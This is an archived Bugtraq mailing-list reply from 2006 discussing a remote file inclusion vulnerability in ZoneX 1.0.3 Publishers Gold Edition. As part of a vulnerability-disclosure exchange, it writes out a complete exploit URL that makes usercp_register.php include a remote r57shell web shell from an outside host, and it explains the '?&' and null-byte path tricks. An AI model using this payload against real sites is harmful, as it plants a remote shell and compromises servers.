lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-ID: <814b9d50609070939s25da2db7i7572a46f92dbef84@mail.gmail.com>
Date: Thu, 7 Sep 2006 11:39:04 -0500
From: str0ke <str0ke@...w0rm.com>
To: "Steven M. Christey" <coley@...re.org>
Cc: maric_sasa@...oo.com, bugtraq@...urityfocus.com
Subject: Re: ZoneX 1.0.3 - Publishers Gold Edition Remote File Inclusion Vulnerability

On 9/6/06, Steven M. Christey <coley@...re.org> wrote:

> In a typical PHP exploit scenario, the attacker could merely add a
> null byte ("%00") to the phpbb_root_path parameter, which would then
> cause the include call to ignore this extra file tree/name
> information.  Is there some reason why a null byte wouldn't work in
> this situation?

You would basically just need to add ?& to the end of the http get
request as so if your including a remote file, since you would be
placing the remaining file tree as a variable name.

http://www.site.com/[path]/includes/usercp_register.php?phpbb_root_path=http://rst.void.ru/download/r57shell.txt?&

Using a null byte should work if magic_quotes = off.

Best Regards,
/str0ke

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ